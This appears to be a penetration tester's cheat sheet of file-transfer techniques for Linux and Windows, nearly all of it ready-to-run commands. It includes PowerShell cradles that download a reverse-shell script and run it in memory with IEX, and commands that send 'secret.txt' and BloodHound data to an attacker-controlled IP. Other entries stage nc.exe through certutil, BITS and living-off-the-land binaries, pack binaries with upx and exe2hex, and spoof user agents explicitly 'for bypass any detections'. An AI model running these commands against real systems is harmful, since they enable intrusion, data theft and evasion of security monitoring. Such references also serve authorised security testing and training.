File Transfers
01. Linux
Simple file transfer (My way)
## ------------------| NetCat
### Receiving side
nc -lp 1234 > out.file
### Sending side
nc -w 3 <ReceiverIP> 1234 < out.file
cat out.file > /dev/tcp/<DestinationIP>/1234
# ------------------| Socat
### Sending side
socat TCP4-LISTEN:1234,fork file:secret.txt
### Receiving side
socat TCP4:<SenderIP>:1234 file:secret.txt,create
# ------------------| SSH
### To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination
### To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination
Download Files.
## ------------------| AXEL
axel -a -n 10 -k -o /tmp/secret.txt https://<IP>/secret.txt
## -a Alternate progress indicator
## -n Specify maximum number of connections
## -k Don't verify the SSL certificate
## ------------------| WGET
wget https://<IP>/secret.txt -O /tmp/secret.txt
## ------------------| CURL
curl https://<IP>/secret.txt -o /tmp/secret.txt
## ------------------| OpenSSL
### Create certificate
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
### Stand up server
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/secret.txt
### Download file
openssl s_client -connect <IP>:80 -quiet > secret.txt
## ------------------| Bash (/dev/tcp)
### Connect to Target's Webserver
exec 3<>/dev/tcp/10.10.10.32/80
### HTTP GET Request
echo -e "GET /secret.txt HTTP/1.1\n\n">&3
### Print the Response
cat <&3
## ------------------| PHP
### File_get_contents()
php -r '$file = file_get_contents("https://<IP>/secret.txt"); file_put_contents("secret.txt",$file);'
### Fopen()
php -r 'const BUFFER = 1024; $fremote = fopen("https://<IP>/secret.txt", "rb"); $flocal = fopen("secret.txt", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
## ------------------| Python
### Python2
import urllib
urllib.urlretrieve ("https://<IP>/secret.txt", "secret.txt")
### Python3
import urllib.request
urllib.request.urlretrieve("https://<IP>/secret.txt", "secret.txt")
## ------------------| Ruby
ruby -e 'require "net/http"; File.write("secret.txt", Net::HTTP.get(URI.parse("https://<IP>/secret.txt")))'
## ------------------| Perl
perl -e 'use LWP::Simple; getstore("https://<IP>/secret.txt", "secret.txt");'
02. Windows
## ------------------| Download & Execute
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://<IP>/powercat.ps1')"
## ------------------| Sender
powercat -c <IP> -p 1212 -i C:\Users\secret.txt
## ------------------| Receiver
nc -lnvp 1212 > secret.txt
Download files.
## ------------------| Old version (support for any version)
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', 'C:\Users\Public\nc.exe')"
## ------------------| New version (alias IWR)
powershell -c "Invoke-WebRequest http://<IP>/nc.exe -OutFile C:\Users\Public\nc.exe"
## ------------------| Executed in memory (alias IEX)
powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.25/rev.ps1')"
powershell -c "Invoke-WebRequest http://10.10.14.25/rev.ps1 | iex"
## ------------------| Internet Explorer’s First Run error (-useBasicParsing)
powershell -c "IWR -useBasicParsing http://<IP>/nc.exe -o C:\Users\Public\nc.exe"
### If you have admin access you can disable Internet Explorer’s First Run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2
## ------------------| CMD ways
certutil -urlcache -split -f "http://<IP>/nc.exe" C:\Users\Public\nc.exe
## ------------------| Using Curl
powershell curl http://<IP>/rev.ps1
## ------------------| The Background Intelligent Transfer Service (BITS)
bitsadmin /transfer n http://<IP>/nc.exe C:\Temp\nc.exe
Import-Module bitstransfer;Start-BitsTransfer -Source "http://<IP>/nc.exe" -Destination "C:\Temp\nc.exe"
Upload Files.
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:/<PATH>/BloodHound.zip' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:443 -Method POST -Body $b64
## Download file with netcat
echo <base64> | base64 -d -w 0 > bloodhound.zip
## ------------------| The Background Intelligent Transfer Service (BITS)
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://<IP>/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql
## ------------------| HTTP POST
### Creare following up.php code in host machine
<?php
$up_dir = '/var/www/html/';
$up_file = $up_dir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['name'], $up_file);
?>
### Change file permision
sudo chown www-data: /var/www/html
### Upload file through powershell
powershell (New-Object Net.WebClient).UploadFile('http://<IP>/up.php', 'nc.exe')
wget
Scripts
## ------------------| Create wget.js file
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
## ------------------| It can be executed as follows.
cscript /nologo wget.js http://<IP>/nc.exe nc.exe
## ------------------| Create wget.vbs file
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with
## ------------------| It can be executed as follows.
cscript /nologo wget.vbs http://<IP>/nc.exe nc.exe
Diffrent
User-Agent
(For bypass any detections)
## ------------------| WinHttp (Netscape 4.0)
$h=new-object -com WinHttp.WinHttpRequest.5.1;
$h.open('GET','http://<IP>/nc.exe',$false);
$h.send();
iex $h.ResponseText
## ------------------| Msxml2 (Internet Explorer 7.0)
$h=New-Object -ComObject Msxml2.XMLHTTP;
$h.open('GET','http://<IP>/nc.exe',$false);
$h.send();
iex $h.responseText
## ------------------| Certutil
certutil -urlcache -split -f http://<IP>/nc.exe
certutil -verifyctl -split -f http://<IP>/nc.exe
## ------------------| BITS
Import-Module bitstransfer;
Start-BitsTransfer 'http://<IP>/nc.exe' $env:temp\t;
$r=gc $env:temp\t;
rm $env:temp\t;
iex $r
## ------------------| Invoke-WebRequest with User-Agent
### List all avilable user agents
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
### Download file using a Chrome User Agent
Invoke-WebRequest http://<IP>/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "C:\Users\Public\nc.exe"
exe2hex
Download
upx -9 nc.exe
exe2hex -x nc.exe
03. Simple Servers
Web servers
## ------------------| Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080
## ------------------| Ruby
ruby -run -e httpd . -p 8080
## ------------------| PHP
php -S 0.0.0.0:8080
## ------------------| Socat
socat TCP-LISTEN:8080,reuseaddr,fork
## ------------------| BusyBox
busybox httpd -f -p 10000
## ------------------| HTTPS
git clone https://github.com/h4rithd/SPython3.git && cd SPython3
pip3 install -r requirements.txt
python3 spython3.py
FTP server
python3 -m pyftpdlib --user=pentester --password=p4ssw0rd -wTFTP
TFTP server (Require Administrative Access)
## ------------------| Windows Enable TFTP
DISM /online /Enable-Feature /FeatureName:TFTP
Install-WindowsFeature TFTP-Client
## ------------------| Linux
sudo apt-get install -y atftp
mkdir /tmp/tftp
sudo chown nobody: /tmp/tftp
sudo atftpd --daemon --port 40 /tmp/tftp
## ------------------| Upload file (on windows machine)
tftp -i <IP> put nc.exe
SMB server
## ------------------| Basic usage
impacket-smbserver <shareName> <sharePath>
impacket-smbserver share $(pwd) -smb2support
## ------------------| Start smb server (With auth)
### Start smb server
impacket-smbserver share $(pwd) -smb2support -username h4rithd -password Password123
## ------------------| Mount without auth
net use Z: \\<MyIP>\share /USER:h4rithd Password123
New-PSDrive -Name h4rithd -PSProvider FileSystem -Root \\<MyIP>\share
## ------------------| Mount with auth
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('h4rithd', $pass)
New-PSDrive -Name h4rithd -PSProvider FileSystem -Credential $cred -Root \\<MyIP>\share
cd h4rithd:
dir
RDP Server
rdesktop -g 1600x800 -r disk:tmp=/tmp/shares <IP> -u h4rithd -p /dynamic-resolution
xfreerdp /u:h4rithd /p:Password123 /cert:ignore /v:<IP> /workarea /drive:/localdir,share /dynamic-resolution +clipboard
Setup
nginx
server to upload files.
## ------------------| Create server
mkdir -p /tmp/uploads
chmod 777 /tmp/uploads/
sudo chown www-data /tmp/uploads/
sudo vi /etc/nginx/sites-available/file_upload
server {
listen 8001 default_server;
server_name up.h4rithd;
location / {
root /tmp/uploads;
dav_methods PUT;
}
}
sudo ln -s /etc/nginx/sites-available/file_upload /etc/nginx/sites-enabled/file_upload
systemctl start nginx
## ------------------| Upload File
curl --upload-file UploadFile.txt IP:8001
04. Living Off The Land Binaries
GfxDownloadWrapper.exe "http://<IP>/nc.exe" "C:\Temp\nc.exe"
lwp-download http://<IP>/nc.exe nc.exe
Last updated